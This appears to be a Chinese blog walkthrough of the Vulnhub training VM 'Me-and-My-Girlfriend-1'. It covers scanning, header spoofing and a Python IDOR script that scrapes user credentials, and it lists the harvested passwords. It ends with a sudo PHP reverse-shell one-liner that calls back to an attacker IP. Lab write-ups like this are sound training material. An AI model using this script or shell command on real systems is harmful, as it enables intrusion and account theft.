【Vulnhub】靶机Me-and-My-Girlfriend-1

前言

• Vulnhub刷题简单记录

Me-and-My-Girlfriend-1

描述

描述：这个虚拟机告诉我们有一对恋人，爱丽丝和鲍勃，这对夫妇原本非常浪漫，但自从爱丽丝在一家私人公司“Ceban Corp”工作后，爱丽丝对鲍勃的态度发生了一些变化是“隐藏的”，Bob 请求您帮助获取 Alice 隐藏的内容并获得对公司的完全访问权限！

难度级别：初学者

注意：有 2 个标志文件

学习：Web 应用程序 | 简单的提权

https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/

Me-and-My-Girlfriend-1开始

1、可以用两种方法确认靶场的存在，扫ip

netdiscover -i eth0 -r 192.168.1.0/24
nmap -sn 192.168.1.0/24

2、扫目标端口开发情况

nmap -sV -sC -A 192.168.1.108

3、访问主页，根据提示说有一个password_resets，我们扫一下目录情况

gobuster dir -u http://192.168.1.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200

dirb http://192.168.1.104/

4、进入主页，发下必须改x-forwarded-for为本地地址，所以下个插件改为127.0.0.1来访问

5、注册之后，发现有平行越权获取用户的账号和密码，写个脚本跑一波

# coding:utf-8
import re
import requests

def get_UserInfo(id):
    cookies = {
            "PHPSESSID":"ve33ic8l6hhrn6004ul1binas3"
        }
    headers = {
            "X-Forwarded-For": "127.0.0.1",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"
        }
    res = requests.get("http://192.168.56.104/index.php?page=profile&user_id={}".format(id),headers=headers,cookies=cookies).text

    name = re.search("name\" value=\"(.*?)\">",res).group(1)
    username = re.search("rname\" value=\"(.*?)\">",res).group(1)
    password = re.search("word\" value=\"(.*?)\">",res).group(1)
    return name,username,password
for i in range(1,20):
    name,username,password = get_UserInfo(i)
    if name:
        print(username+":"+password)

获取了密码

6、经典的爆破密码

eweuhtandingan:skuyatuh
aingmaung:qwerty!!!
sundatea:indONEsia
sedihaingmah:cedihhihihi
alice:4lic3
abdikasepak:dorrrrr
gylq:gylq

7、登陆，拿flag

8、简单提权

sudo -l发现php是可以无密码使用root权限

反弹root权限

sudo /usr/bin/php -r '$sock=fsockopen("192.168.56.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");

我的个人博客

孤桜懶契：http://gylq.gitee.io